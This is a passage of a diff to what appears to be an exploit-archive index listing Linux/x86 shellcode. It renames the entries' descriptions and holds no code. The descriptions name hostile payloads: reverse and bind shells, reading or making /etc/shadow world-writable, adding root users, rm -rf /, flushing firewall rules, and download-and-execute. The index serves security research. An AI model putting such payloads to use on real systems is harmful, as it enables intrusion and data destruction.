Shellcode (155 bytes)",2008-08-18,0in,lin_x86,shellcode,0 +13339,platforms/lin_x86/shellcode/13339.asm,"Linux/x86 - Reverse TCP cat /etc/shadow (8192/TCP) Shellcode (155 bytes)",2008-08-18,0in,lin_x86,shellcode,0 13340,platforms/lin_x86/shellcode/13340.c,"Linux/x86 - Reverse PHP (Writes to /var/www/cb.php On The Filesystem) Shell Shellcode (508 bytes)",2008-08-18,GS2008,lin_x86,shellcode,0 13341,platforms/lin_x86/shellcode/13341.c,"Linux/x86 - rm -rf / Attempts To Block The Process From Being Stopped Shellcode (132 bytes)",2008-08-18,onionring,lin_x86,shellcode,0 -13342,platforms/lin_x86/shellcode/13342.c,"Linux/x86 - setuid(0) . setgid(0) . aslr_off Shellcode (79 bytes)",2008-08-18,LiquidWorm,lin_x86,shellcode,0 +13342,platforms/lin_x86/shellcode/13342.c,"Linux/x86 - setuid(0) + setgid(0) + aslr_off (Disable ASLR Security) Shellcode (79 bytes)",2008-08-18,LiquidWorm,lin_x86,shellcode,0 13343,platforms/lin_x86/shellcode/13343.asm,"Linux/x86 - raw-socket ICMP/checksum shell Shellcode (235 bytes)",2007-04-02,mu-b,lin_x86,shellcode,0 -13344,platforms/lin_x86/shellcode/13344.c,"Linux/x86 - /sbin/iptables -F Shellcode (40 bytes)",2007-03-09,"Kris Katterjohn",lin_x86,shellcode,0 +13344,platforms/lin_x86/shellcode/13344.c,"Linux/x86 - Flush IPTables Rules (/sbin/iptables -F) Shellcode (40 bytes)",2007-03-09,"Kris Katterjohn",lin_x86,shellcode,0 13345,platforms/lin_x86/shellcode/13345.c,"Linux/x86 - kill all processes Shellcode (11 bytes)",2007-03-09,"Kris Katterjohn",lin_x86,shellcode,0 13346,platforms/lin_x86/shellcode/13346.s,"Linux/x86 - execve read Shellcode (92 bytes)",2006-11-20,0ut0fbound,lin_x86,shellcode,0 -13347,platforms/lin_x86/shellcode/13347.c,"Linux/x86 - /sbin/ipchains -F Shellcode (40 bytes)",2006-11-17,"Kris Katterjohn",lin_x86,shellcode,0 +13347,platforms/lin_x86/shellcode/13347.c,"Linux/x86 - Flush IPChains Rules (/sbin/ipchains -F) Shellcode (40 bytes)",2006-11-17,"Kris Katterjohn",lin_x86,shellcode,0 13348,platforms/lin_x86/shellcode/13348.c,"Linux/x86 - Set System Time to 0 + exit Shellcode (12 bytes)",2006-11-17,"Kris Katterjohn",lin_x86,shellcode,0 13349,platforms/lin_x86/shellcode/13349.c,"Linux/x86 - Add Root User (r00t) To /etc/passwd Shellcode (69 bytes)",2006-11-17,"Kris Katterjohn",lin_x86,shellcode,0 13350,platforms/lin_x86/shellcode/13350.c,"Linux/x86 - chmod 0666 /etc/shadow Shellcode (36 bytes)",2006-11-17,"Kris Katterjohn",lin_x86,shellcode,0 @@ -15874,44 +15879,44 @@ id,file,description,date,author,platform,type,port 13352,platforms/lin_x86/shellcode/13352.c,"Linux/x86 - execve(rm -rf /) Shellcode (45 bytes)",2006-11-17,"Kris Katterjohn",lin_x86,shellcode,0 13353,platforms/lin_x86/shellcode/13353.c,"Linux/x86 - setuid(0) + execve(/bin/sh) Shellcode (28 bytes)",2006-11-16,Revenge,lin_x86,shellcode,0 13354,platforms/lin_x86/shellcode/13354.c,"Linux/x86 - execve(/bin/sh) Shellcode (22 bytes)",2006-11-16,Revenge,lin_x86,shellcode,0 -13355,platforms/lin_x86/shellcode/13355.c,"Linux/x86 - HTTP/1.x GET_ Downloads + execve() Shellcode (111+ bytes)",2006-10-22,izik,lin_x86,shellcode,0 -13356,platforms/lin_x86/shellcode/13356.c,"Linux/x86 - executes command after setreuid Shellcode (49+ bytes)",2006-08-02,bunker,lin_x86,shellcode,0 +13355,platforms/lin_x86/shellcode/13355.c,"Linux/x86 - HTTP/1.x GET + Downloads + execve() Null-Free Shellcode (111+ bytes)",2006-10-22,izik,lin_x86,shellcode,0 +13356,platforms/lin_x86/shellcode/13356.c,"Linux/x86 - setreuid + executes command (49+ bytes)",2006-08-02,bunker,lin_x86,shellcode,0 13357,platforms/lin_x86/shellcode/13357.c,"Linux/x86 - stdin re-open + /bin/sh exec Shellcode (39 bytes)",2006-07-20,"Marco Ivaldi",lin_x86,shellcode,0 13358,platforms/lin_x86/shellcode/13358.c,"Linux/x86 - re-use of /bin/sh string in .rodata Shellcode (16 bytes)",2006-07-20,"Marco Ivaldi",lin_x86,shellcode,0 13359,platforms/lin_x86/shellcode/13359.c,"Linux/x86 - setuid(0) + /bin/sh execve() Shellcode (30 bytes)",2006-07-20,"Marco Ivaldi",lin_x86,shellcode,0 -13360,platforms/lin_x86/shellcode/13360.c,"Linux/x86 - Bind 31337/TCP + setuid Shellcode (96 bytes)",2006-07-20,"Marco Ivaldi",lin_x86,shellcode,0 -13361,platforms/lin_x86/shellcode/13361.c,"Linux/x86 - Bind 2707/TCP Shellcode (84 bytes)",2006-07-04,oveRet,lin_x86,shellcode,0 +13360,platforms/lin_x86/shellcode/13360.c,"Linux/x86 - Bind TCP /bin/sh Shell (31337/TCP) + setuid Shellcode (96 bytes)",2006-07-20,"Marco Ivaldi",lin_x86,shellcode,0 +13361,platforms/lin_x86/shellcode/13361.c,"Linux/x86 - Bind TCP Shell (2707/TCP) Shellcode (84 bytes)",2006-07-04,oveRet,lin_x86,shellcode,0 13362,platforms/lin_x86/shellcode/13362.c,"Linux/x86 - execve() Diassembly Obfuscation Shellcode (32 bytes)",2006-05-14,BaCkSpAcE,lin_x86,shellcode,0 -13363,platforms/lin_x86/shellcode/13363.c,"Linux/x86 - Bind 31337/TCP SET_PORT() Shellcode (100 bytes)",2006-05-08,"Benjamin Orozco",lin_x86,shellcode,0 -13364,platforms/lin_x86/shellcode/13364.c,"Linux/x86 - Reverse TCP Shell (192.168.13.22:31337) Shellcode (82 bytes) (Generator)",2006-05-08,"Benjamin Orozco",lin_x86,shellcode,0 +13363,platforms/lin_x86/shellcode/13363.c,"Linux/x86 - Bind TCP /bin/sh Shell (31337/TCP) Shellcode (100 bytes)",2006-05-08,"Benjamin Orozco",lin_x86,shellcode,0 +13364,platforms/generator/shellcode/13364.c,"Linux/x86 - Reverse TCP /bin/sh Shell (192.168.13.22:31337) Shellcode (82 bytes) (Generator)",2006-05-08,"Benjamin Orozco",generator,shellcode,0 13365,platforms/lin_x86/shellcode/13365.c,"Linux/x86 - execve(/bin/sh) Shellcode (24 bytes)",2006-05-01,hophet,lin_x86,shellcode,0 -13366,platforms/lin_x86/shellcode/13366.txt,"Linux/x86 - Reverse TCP XOR Encoded Shell (127.0.0.1:80/TCP) Shellcode (371 bytes)",2006-04-18,xort,lin_x86,shellcode,0 +13366,platforms/lin_x86/shellcode/13366.txt,"Linux/x86 - Reverse TCP Shell (127.0.0.1:80/TCP) XOR Encoded Shellcode (371 bytes)",2006-04-18,xort,lin_x86,shellcode,0 13367,platforms/lin_x86/shellcode/13367.c,"Linux/x86 - execve(/bin/sh) + .ZIP Header Shellcode (28 bytes)",2006-04-17,izik,lin_x86,shellcode,0 13368,platforms/lin_x86/shellcode/13368.c,"Linux/x86 - execve(/bin/sh) + .RTF Header Shellcode (30 bytes)",2006-04-17,izik,lin_x86,shellcode,0 13369,platforms/lin_x86/shellcode/13369.c,"Linux/x86 - execve(/bin/sh) + .RIFF Header Shellcode (28 bytes)",2006-04-17,izik,lin_x86,shellcode,0 13370,platforms/lin_x86/shellcode/13370.c,"Linux/x86 - execve(/bin/sh) + .BMP Bitmap Header Shellcode (27 bytes)",2006-04-17,izik,lin_x86,shellcode,0 -13371,platforms/lin_x86/shellcode/13371.c,"Linux/x86 - /tmp/swr to SWAP restore Shellcode (109 bytes)",2006-04-16,"Gotfault Security",lin_x86,shellcode,0 +13371,platforms/lin_x86/shellcode/13371.c,"Linux/x86 - Read SWAP write to /tmp/swr Shellcode (109 bytes)",2006-04-16,"Gotfault Security",lin_x86,shellcode,0 13372,platforms/lin_x86/shellcode/13372.c,"Linux/x86 - SWAP store from /tmp/sws Shellcode (99 bytes)",2006-04-16,"Gotfault Security",lin_x86,shellcode,0 -13373,platforms/lin_x86/shellcode/13373.c,"Linux/x86 - Bind TCP Password (gotfault) Shell (64713/TCP) Shellcode (166 bytes)",2006-04-06,"Gotfault Security",lin_x86,shellcode,0 -13374,platforms/lin_x86/shellcode/13374.c,"Linux/x86 - Bind 64713/TCP Shellcode (86 bytes)",2006-04-06,"Gotfault Security",lin_x86,shellcode,0 +13373,platforms/lin_x86/shellcode/13373.c,"Linux/x86 - Bind TCP /bin/sh Password (gotfault) Shell (64713/TCP) Shellcode (166 bytes)",2006-04-06,"Gotfault Security",lin_x86,shellcode,0 +13374,platforms/lin_x86/shellcode/13374.c,"Linux/x86 - Bind TCP /bin/sh Shell (64713/TCP) Shellcode (86 bytes)",2006-04-06,"Gotfault Security",lin_x86,shellcode,0 13375,platforms/lin_x86/shellcode/13375.c,"Linux/x86 - execve(_/bin/sh__ [_/bin/sh__ NULL]) Shellcode (25 bytes)",2006-04-03,"Gotfault Security",lin_x86,shellcode,0 13376,platforms/lin_x86/shellcode/13376.c,"Linux/x86 - execve(_/bin/sh__ [_/bin/sh__ NULL]) Shellcode (23 bytes)",2006-04-03,"Gotfault Security",lin_x86,shellcode,0 13377,platforms/lin_x86/shellcode/13377.c,"Linux/x86 - setuid(0) + execve(_/bin/sh__ [_/bin/sh__ NULL]) Shellcode (31 bytes)",2006-04-03,"Gotfault Security",lin_x86,shellcode,0 13378,platforms/lin_x86/shellcode/13378.c,"Linux/x86 - setuid(0) + setgid(0) + execve(/bin/sh_ [/bin/sh_ NULL]) Shellcode (37 bytes)",2006-04-03,"Gotfault Security",lin_x86,shellcode,0 -13379,platforms/lin_x86/shellcode/13379.c,"Linux/x86 - setreuid(0_0) execve(_/bin/sh__ [_/bin/sh__ NULL]) Shellcode (33 bytes)",2006-04-03,"Gotfault Security",lin_x86,shellcode,0 +13379,platforms/lin_x86/shellcode/13379.c,"Linux/x86 - setreuid(0_0) + execve(_/bin/sh__ [_/bin/sh__ NULL]) Shellcode (33 bytes)",2006-04-03,"Gotfault Security",lin_x86,shellcode,0 13380,platforms/lin_x86/shellcode/13380.c,"Linux/x86 - HTTP/1.x GET_ Downloads + JMP Shellcode (68+ bytes)",2006-03-12,izik,lin_x86,shellcode,0 -13381,platforms/lin_x86/shellcode/13381.c,"Linux/x86 - TCP Proxy Shellcode (236 bytes)",2006-02-07,phar,lin_x86,shellcode,0 +13381,platforms/lin_x86/shellcode/13381.c,"Linux/x86 - TCP Proxy Null-Free Shellcode (236 bytes)",2006-02-07,phar,lin_x86,shellcode,0 13382,platforms/lin_x86/shellcode/13382.c,"Linux/x86 - execve /bin/sh Anti-IDS Shellcode (40 bytes)",2006-01-26,NicatiN,lin_x86,shellcode,0 -13383,platforms/lin_x86/shellcode/13383.c,"Linux/x86 - execve /bin/sh xored for Intel x86 CPUID Shellcode (41 bytes)",2006-01-25,izik,lin_x86,shellcode,0 -13384,platforms/lin_x86/shellcode/13384.c,"Linux/x86 - execve /bin/sh Shellcode (+1 Encoded) (39 bytes)",2006-01-25,izik,lin_x86,shellcode,0 -13385,platforms/lin_x86/shellcode/13385.c,"Linux/x86 - Add User (xtz) To /etc/passwd Shellcode (59 bytes)",2006-01-21,izik,lin_x86,shellcode,0 -13386,platforms/lin_x86/shellcode/13386.c,"Linux/x86 - anti-debug trick (INT 3h trap) + execve /bin/sh Shellcode (39 bytes)",2006-01-21,izik,lin_x86,shellcode,0 -13387,platforms/lin_x86/shellcode/13387.c,"Linux/x86 - Bind /bin/sh to 31337/TCP Shellcode (80 bytes)",2006-01-21,izik,lin_x86,shellcode,0 -13388,platforms/lin_x86/shellcode/13388.c,"Linux/x86 - Bind /bin/sh to 31337/TCP + fork() Shellcode (98 bytes)",2006-01-21,izik,lin_x86,shellcode,0 +13383,platforms/lin_x86/shellcode/13383.c,"Linux/x86 (Intel x86 CPUID) - execve /bin/sh XORED Encoded Shellcode (41 bytes)",2006-01-25,izik,lin_x86,shellcode,0 +13384,platforms/lin_x86/shellcode/13384.c,"Linux/x86 - execve /bin/sh Shellcode +1 Encoded (39 bytes)",2006-01-25,izik,lin_x86,shellcode,0 +13385,platforms/lin_x86/shellcode/13385.c,"Linux/x86 - Add Root User (xtz) To /etc/passwd Shellcode (59 bytes)",2006-01-21,izik,lin_x86,shellcode,0 +13386,platforms/lin_x86/shellcode/13386.c,"Linux/x86 - Anti-Debug Trick (INT 3h trap) + execve /bin/sh Shellcode (39 bytes)",2006-01-21,izik,lin_x86,shellcode,0 +13387,platforms/lin_x86/shellcode/13387.c,"Linux/x86 - Bind TCP /bin/sh Shell (31337/TCP) Shellcode (80 bytes)",2006-01-21,izik,lin_x86,shellcode,0 +13388,platforms/lin_x86/shellcode/13388.c,"Linux/x86 - Bind TCP /bin/sh Shell (31337/TCP) + fork() Shellcode (98 bytes)",2006-01-21,izik,lin_x86,shellcode,0 13389,platforms/lin_x86/shellcode/13389.c,"Linux/x86 - Open CD-Rom Loop 24/7 (Follows /dev/cdrom Symlink) Shellcode (39 bytes)",2006-01-21,izik,lin_x86,shellcode,0 13390,platforms/lin_x86/shellcode/13390.c,"Linux/x86 - eject cd-rom (follows /dev/cdrom symlink) + exit() Shellcode (40 bytes)",2006-01-21,izik,lin_x86,shellcode,0 13391,platforms/lin_x86/shellcode/13391.c,"Linux/x86 - eject/close cd-rom loop (follows /dev/cdrom symlink) Shellcode (45 bytes)",2006-01-21,izik,lin_x86,shellcode,0 -13392,platforms/lin_x86/shellcode/13392.c,"Linux/x86 - chmod(/etc/shadow_ 0666) + exit() Shellcode (32 bytes)",2006-01-21,izik,lin_x86,shellcode,0 +13392,platforms/lin_x86/shellcode/13392.c,"Linux/x86 - chmod 0666 /etc/shadow + exit() Shellcode (32 bytes)",2006-01-21,izik,lin_x86,shellcode,0 13393,platforms/lin_x86/shellcode/13393.c,"Linux/x86 - Reverse TCP Shell (127.0.0.1:31337/TCP) Shellcode (74 bytes)",2006-01-21,izik,lin_x86,shellcode,0 13394,platforms/lin_x86/shellcode/13394.c,"Linux/x86 - normal exit with random (so to speak) return value Shellcode (5 bytes)",2006-01-21,izik,lin_x86,shellcode,0 13395,platforms/lin_x86/shellcode/13395.c,"Linux/x86 - getppid() + execve(/proc/pid/exe) Shellcode (51 bytes)",2006-01-21,izik,lin_x86,shellcode,0 @@ -15920,25 +15925,25 @@ id,file,description,date,author,platform,type,port 13398,platforms/lin_x86/shellcode/13398.c,"Linux/x86 - setreuid(0_ 0) + execve(/bin/sh) Shellcode (31 bytes)",2006-01-21,izik,lin_x86,shellcode,0 13399,platforms/lin_x86/shellcode/13399.c,"Linux/x86 - execve(/bin/sh) + PUSH Shellcode (23 bytes)",2006-01-21,izik,lin_x86,shellcode,0 13400,platforms/lin_x86/shellcode/13400.c,"Linux/x86 - cat /dev/urandom > /dev/console Shellcode (63 bytes)",2006-01-21,izik,lin_x86,shellcode,0 -13401,platforms/lin_x86/shellcode/13401.c,"Linux/x86 - Reverse TCP Shell Shellcode (90 bytes) (Generator)",2005-12-28,xort,lin_x86,shellcode,0 +13401,platforms/generator/shellcode/13401.c,"Linux/x86 - Reverse TCP Shell Shellcode (90 bytes) (Generator)",2005-12-28,xort,generator,shellcode,0 13402,platforms/lin_x86/shellcode/13402.c,"Linux/x86 - Socket-proxy Shellcode (372 bytes)",2005-12-28,xort,lin_x86,shellcode,0 13403,platforms/lin_x86/shellcode/13403.c,"Linux/x86 - dup2(0_0); dup2(0_1); dup2(0_2); Shellcode (15 bytes)",2005-11-09,"Charles Stevenson",lin_x86,shellcode,0 13404,platforms/lin_x86/shellcode/13404.c,"Linux/x86 - if(read(fd_buf_512)<=2) _exit(1) else buf(); Shellcode (29 bytes)",2005-11-09,"Charles Stevenson",lin_x86,shellcode,0 13405,platforms/lin_x86/shellcode/13405.c,"Linux/x86 - _exit(1); Shellcode (7 bytes)",2005-11-09,"Charles Stevenson",lin_x86,shellcode,0 -13406,platforms/lin_x86/shellcode/13406.c,"Linux/x86 - read(0_buf_2541); chmod(buf_4755); Shellcode (23 bytes)",2005-11-09,"Charles Stevenson",lin_x86,shellcode,0 -13407,platforms/lin_x86/shellcode/13407.c,"Linux/x86 - write(0__Hello core!\n__12); (with optional 7 byte exit) Shellcode (36 bytes)",2005-11-09,"Charles Stevenson",lin_x86,shellcode,0 -13408,platforms/lin_x86/shellcode/13408.c,"Linux/x86 - snoop /dev/dsp Shellcode (172 bytes)",2005-11-04,phar,lin_x86,shellcode,0 -13409,platforms/lin_x86/shellcode/13409.c,"Linux/x86 - /bin/sh Standard Opcode Array Payload Shellcode (21 bytes)",2005-09-15,c0ntex,lin_x86,shellcode,0 +13406,platforms/lin_x86/shellcode/13406.c,"Linux/x86 - read(0_buf_2541); + chmod(buf_4755); Shellcode (23 bytes)",2005-11-09,"Charles Stevenson",lin_x86,shellcode,0 +13407,platforms/lin_x86/shellcode/13407.c,"Linux/x86 - write(0__Hello core!\n__12); Exit Shellcode (36/43 bytes)",2005-11-09,"Charles Stevenson",lin_x86,shellcode,0 +13408,platforms/lin_x86/shellcode/13408.c,"Linux/x86 - snoop /dev/dsp Null-Free Shellcode (172 bytes)",2005-11-04,phar,lin_x86,shellcode,0 +13409,platforms/lin_x86/shellcode/13409.c,"Linux/x86 - execve /bin/sh Standard Opcode Array Payload Shellcode (21 bytes)",2005-09-15,c0ntex,lin_x86,shellcode,0 13410,platforms/lin_x86/shellcode/13410.s,"Linux/x86 - examples of long-term payloads hide-wait-change Shellcode (.s) (187+ bytes)",2005-09-09,xort,lin_x86,shellcode,0 13411,platforms/lin_x86/shellcode/13411.c,"Linux/x86 - examples of long-term payloads hide-wait-change Shellcode (187+ bytes)",2005-09-08,xort,lin_x86,shellcode,0 -13412,platforms/lin_x86/shellcode/13412.c,"Linux/x86 - /bin/sh sysenter Opcode Array Payload Shellcode (23 bytes)",2005-09-04,BaCkSpAcE,lin_x86,shellcode,0 -13413,platforms/lin_x86/shellcode/13413.c,"Linux/x86 - /bin/sh sysenter Opcode Array Payload Shellcode (27 bytes)",2005-08-25,amnesia,lin_x86,shellcode,0 -13414,platforms/lin_x86/shellcode/13414.c,"Linux/x86 - /bin/sh sysenter Opcode Array Payload Shellcode (45 bytes)",2005-08-19,c0ntex,lin_x86,shellcode,0 -13415,platforms/lin_x86/shellcode/13415.c,"Linux/x86 - chroot + standart Shellcode (66 bytes)",2005-07-11,Okti,lin_x86,shellcode,0 +13412,platforms/lin_x86/shellcode/13412.c,"Linux/x86 - execve /bin/sh sysenter Opcode Array Payload Shellcode (23 bytes)",2005-09-04,BaCkSpAcE,lin_x86,shellcode,0 +13413,platforms/lin_x86/shellcode/13413.c,"Linux/x86 - execve /bin/sh sysenter Opcode Array Payload Shellcode (27 bytes)",2005-08-25,amnesia,lin_x86,shellcode,0 +13414,platforms/lin_x86/shellcode/13414.c,"Linux/x86 - execve /bin/sh sysenter Opcode Array Payload Shellcode (45 bytes)",2005-08-19,c0ntex,lin_x86,shellcode,0 +13415,platforms/lin_x86/shellcode/13415.c,"Linux/x86 - Break chroot (../ 20x Loop) + execve /bin/sh Shellcode (66 bytes)",2005-07-11,Okti,lin_x86,shellcode,0 13416,platforms/lin_x86/shellcode/13416.txt,"Linux/x86 - upload + exec Shellcode (189 bytes)",2005-06-19,cybertronic,lin_x86,shellcode,0 -13417,platforms/lin_x86/shellcode/13417.c,"Linux/x86 - setreuid/execve Shellcode (31 bytes)",2004-12-26,oc192,lin_x86,shellcode,0 -13418,platforms/lin_x86/shellcode/13418.c,"Linux/x86 - Alphanumeric Shellcode (64 bytes)",2004-12-22,xort,lin_x86,shellcode,0 -13419,platforms/lin_x86/shellcode/13419.c,"Linux/x86 - Alphanumeric using IMUL Method Shellcode (88 bytes)",2004-12-22,xort,lin_x86,shellcode,0 +13417,platforms/lin_x86/shellcode/13417.c,"Linux/x86 - setreuid + execve Shellcode (31 bytes)",2004-12-26,oc192,lin_x86,shellcode,0 +13418,platforms/lin_x86/shellcode/13418.c,"Linux/x86 - Alphanumeric Encoded Shellcode (64 bytes)",2004-12-22,xort,lin_x86,shellcode,0 +13419,platforms/lin_x86/shellcode/13419.c,"Linux/x86 - Alphanumeric Encoder (IMUL Method) Shellcode (88 bytes)",2004-12-22,xort,lin_x86,shellcode,0 13420,platforms/lin_x86/shellcode/13420.c,"Linux/x86 - Radically Self-Modifying Shellcode (70 bytes)",2004-12-22,xort,lin_x86,shellcode,0 13421,platforms/lin_x86/shellcode/13421.c,"Linux/x86 - Magic Byte Self-Modifying Shellcode (76 bytes)",2004-12-22,xort,lin_x86,shellcode,0 13422,platforms/lin_x86/shellcode/13422.c,"Linux/x86 - execve code Shellcode (23 bytes)",2004-11-15,marcetam,lin_x86,shellcode,0 @@ -15946,18 +15951,18 @@ id,file,description,date,author,platform,type,port 13424,platforms/lin_x86/shellcode/13424.txt,"Linux/x86 - execve /bin/sh Alphanumeric Shellcode (392 bytes)",2004-09-26,RaiSe,lin_x86,shellcode,0 13425,platforms/lin_x86/shellcode/13425.c,"Linux/x86 - execve /bin/sh IA32 0xff-less Shellcode (45 bytes)",2004-09-26,anathema,lin_x86,shellcode,0 13426,platforms/lin_x86/shellcode/13426.c,"Linux/x86 - symlink /bin/sh xoring Shellcode (56 bytes)",2004-09-26,dev0id,lin_x86,shellcode,0 -13427,platforms/lin_x86/shellcode/13427.c,"Linux/x86 - Bind 5074/TCP (ToUpper Encoded) Shellcode (226 bytes)",2004-09-26,Tora,lin_x86,shellcode,0 -13428,platforms/lin_x86/shellcode/13428.c,"Linux/x86 - Add User (t00r) Anti-IDS Shellcode (116 bytes)",2004-09-26,"Matias Sedalo",lin_x86,shellcode,0 +13427,platforms/lin_x86/shellcode/13427.c,"Linux/x86 - Bind TCP Shell (5074/TCP) ToUpper Encoded Shellcode (226 bytes)",2004-09-26,Tora,lin_x86,shellcode,0 +13428,platforms/lin_x86/shellcode/13428.c,"Linux/x86 - Add Root User (t00r) Anti-IDS Shellcode (116 bytes)",2004-09-26,"Matias Sedalo",lin_x86,shellcode,0 13429,platforms/lin_x86/shellcode/13429.c,"Linux/x86 - chmod 666 /etc/shadow Anti-IDS Shellcode (75 bytes)",2004-09-26,"Matias Sedalo",lin_x86,shellcode,0 13430,platforms/lin_x86/shellcode/13430.c,"Linux/x86 - symlink . /bin/sh Shellcode (32 bytes)",2004-09-26,dev0id,lin_x86,shellcode,0 13431,platforms/lin_x86/shellcode/13431.c,"Linux/x86 - kill snort Shellcode (151 bytes)",2004-09-26,nob0dy,lin_x86,shellcode,0 13432,platforms/lin_x86/shellcode/13432.c,"Linux/x86 - Shared Memory exec Shellcode (50 bytes)",2004-09-26,sloth,lin_x86,shellcode,0 -13433,platforms/lin_x86/shellcode/13433.c,"Linux/x86 - iptables -F Shellcode (45 bytes)",2004-09-26,UnboundeD,lin_x86,shellcode,0 -13434,platforms/lin_x86/shellcode/13434.c,"Linux/x86 - iptables -F Shellcode (58 bytes)",2004-09-26,dev0id,lin_x86,shellcode,0 +13433,platforms/lin_x86/shellcode/13433.c,"Linux/x86 - Flush IPTables Rules (/sbin/iptables -F) Shellcode (45 bytes)",2004-09-26,UnboundeD,lin_x86,shellcode,0 +13434,platforms/lin_x86/shellcode/13434.c,"Linux/x86 - Flush IPTables Rules (/sbin/iptables -F) Shellcode (58 bytes)",2004-09-26,dev0id,lin_x86,shellcode,0 13435,platforms/lin_x86/shellcode/13435.c,"Linux/x86 - Reverse Telnet Shell (200.182.207.235) Shellcode (134 bytes)",2004-09-26,hts,lin_x86,shellcode,0 -13436,platforms/lin_x86/shellcode/13436.c,"Linux/x86 - connect Shellcode (120 bytes)",2004-09-26,lamagra,lin_x86,shellcode,0 +13436,platforms/lin_x86/shellcode/13436.c,"Linux/x86 - Reverse TCP /bin/sh Shell Shellcode (120 bytes)",2004-09-26,lamagra,lin_x86,shellcode,0 13437,platforms/lin_x86/shellcode/13437.c,"Linux/x86 - chmod 666 /etc/shadow Shellcode (41 bytes)",2004-09-26,"Matias Sedalo",lin_x86,shellcode,0 -13438,platforms/lin_x86/shellcode/13438.c,"Linux/x86 - cp /bin/sh /tmp/katy ; chmod 4555 katy Shellcode (126 bytes)",2004-09-26,RaiSe,lin_x86,shellcode,0 +13438,platforms/lin_x86/shellcode/13438.c,"Linux/x86 - cp /bin/sh /tmp/katy ; + chmod 4555 katy Shellcode (126 bytes)",2004-09-26,RaiSe,lin_x86,shellcode,0 13439,platforms/lin_x86/shellcode/13439.c,"Linux/x86 - eject /dev/cdrom Shellcode (64 bytes)",2004-09-26,lamagra,lin_x86,shellcode,0 13440,platforms/lin_x86/shellcode/13440.c,"Linux/x86 - xterm -ut -display [IP]:0 Shellcode (132 bytes)",2004-09-26,RaiSe,lin_x86,shellcode,0 13441,platforms/lin_x86/shellcode/13441.c,"Linux/x86 - ipchains -F Shellcode (49 bytes)",2004-09-26,Sp4rK,lin_x86,shellcode,0 @@ -15966,40 +15971,39 @@ id,file,description,date,author,platform,type,port 13444,platforms/lin_x86/shellcode/13444.c,"Linux/x86 - execve /bin/sh Shellcode (24 bytes)",2004-09-12,"Matias Sedalo",lin_x86,shellcode,0 13445,platforms/lin_x86/shellcode/13445.c,"Linux/x86 - execve /bin/sh Shellcode (38 bytes)",2004-09-12,"Matias Sedalo",lin_x86,shellcode,0 13446,platforms/lin_x86/shellcode/13446.c,"Linux/x86 - execve /bin/sh Shellcode (30 bytes)",2004-09-12,"Matias Sedalo",lin_x86,shellcode,0 -13447,platforms/lin_x86/shellcode/13447.c,"Linux/x86 - execve /bin/sh setreuid(12_12) Shellcode (50 bytes)",2004-09-12,anonymous,lin_x86,shellcode,0 -13448,platforms/lin_x86/shellcode/13448.c,"Linux/x86 - Bind 5074/TCP Shellcode (92 bytes)",2004-09-12,"Matias Sedalo",lin_x86,shellcode,0 -13449,platforms/lin_x86/shellcode/13449.c,"Linux/x86 - Bind 5074/TCP + fork() Shellcode (130 bytes)",2004-09-12,"Matias Sedalo",lin_x86,shellcode,0 -13450,platforms/lin_x86/shellcode/13450.c,"Linux/x86 - Add User (t00r) Shellcode (82 bytes)",2004-09-12,"Matias Sedalo",lin_x86,shellcode,0 -13451,platforms/lin_x86/shellcode/13451.c,"Linux/x86 - Add User Shellcode (104 bytes)",2004-09-12,"Matt Conover",lin_x86,shellcode,0 -13452,platforms/lin_x86/shellcode/13452.c,"Linux/x86 - break chroot Shellcode (34 bytes)",2004-09-12,dev0id,lin_x86,shellcode,0 -13453,platforms/lin_x86/shellcode/13453.c,"Linux/x86 - break chroot Shellcode (46 bytes)",2004-09-12,dev0id,lin_x86,shellcode,0 -13454,platforms/lin_x86/shellcode/13454.c,"Linux/x86 - break chroot execve /bin/sh Shellcode (80 bytes)",2004-09-12,preedator,lin_x86,shellcode,0 +13447,platforms/lin_x86/shellcode/13447.c,"Linux/x86 - execve /bin/sh + setreuid(12_12) Shellcode (50 bytes)",2004-09-12,anonymous,lin_x86,shellcode,0 +13448,platforms/lin_x86/shellcode/13448.c,"Linux/x86 - Bind TCP Shell (5074/TCP) Shellcode (92 bytes)",2004-09-12,"Matias Sedalo",lin_x86,shellcode,0 +13449,platforms/lin_x86/shellcode/13449.c,"Linux/x86 - Bind TCP Shell (5074/TCP) + fork() Shellcode (130 bytes)",2004-09-12,"Matias Sedalo",lin_x86,shellcode,0 +13450,platforms/lin_x86/shellcode/13450.c,"Linux/x86 - Add Root User (t00r) Shellcode (82 bytes)",2004-09-12,"Matias Sedalo",lin_x86,shellcode,0 +13451,platforms/lin_x86/shellcode/13451.c,"Linux/x86 - Add Root User Shellcode (104 bytes)",2004-09-12,"Matt Conover",lin_x86,shellcode,0 +13452,platforms/lin_x86/shellcode/13452.c,"Linux/x86 - Break chroot (../ 10x Loop) Shellcode (34 bytes)",2004-09-12,dev0id,lin_x86,shellcode,0 +13453,platforms/lin_x86/shellcode/13453.c,"Linux/x86 - Break chroot (../ 10x Loop) Shellcode (46 bytes)",2004-09-12,dev0id,lin_x86,shellcode,0 +13454,platforms/lin_x86/shellcode/13454.c,"Linux/x86 - Break chroot + execve /bin/sh Shellcode (80 bytes)",2004-09-12,preedator,lin_x86,shellcode,0 13455,platforms/lin_x86/shellcode/13455.c,"Linux/x86 - execve /bin/sh Anti-IDS Shellcode (58 bytes)",2004-09-12,"Matias Sedalo",lin_x86,shellcode,0 -13456,platforms/lin_x86/shellcode/13456.c,"Linux/x86 - execve /bin/sh (XOR Encoded) Shellcode (55 bytes)",2004-09-12,anonymous,lin_x86,shellcode,0 +13456,platforms/lin_x86/shellcode/13456.c,"Linux/x86 - execve /bin/sh XOR Encoded Shellcode (55 bytes)",2004-09-12,anonymous,lin_x86,shellcode,0 13457,platforms/lin_x86/shellcode/13457.c,"Linux/x86 - execve /bin/sh (tolower() Evasion) Shellcode (41 bytes)",2004-09-12,anonymous,lin_x86,shellcode,0 13458,platforms/lin_x86/shellcode/13458.c,"Linux/x86 - setreuid(0_0) + execve /bin/sh Shellcode (46+ bytes)",2001-05-07,"Marco Ivaldi",lin_x86,shellcode,0 -13459,platforms/lin_x86/shellcode/13459.c,"Linux/x86 - chroot()/execve() code Shellcode (80 bytes)",2001-01-13,preedator,lin_x86,shellcode,0 13460,platforms/lin_x86/shellcode/13460.c,"Linux/x86 - execve /bin/sh (toupper() Evasion) Shellcode (55 bytes)",2000-08-08,anonymous,lin_x86,shellcode,0 -13461,platforms/lin_x86/shellcode/13461.c,"Linux/x86 - Add User (z) Shellcode (70 bytes)",2000-08-07,anonymous,lin_x86,shellcode,0 -13462,platforms/lin_x86/shellcode/13462.c,"Linux/x86 - break chroot setuid(0) + /bin/sh Shellcode (132 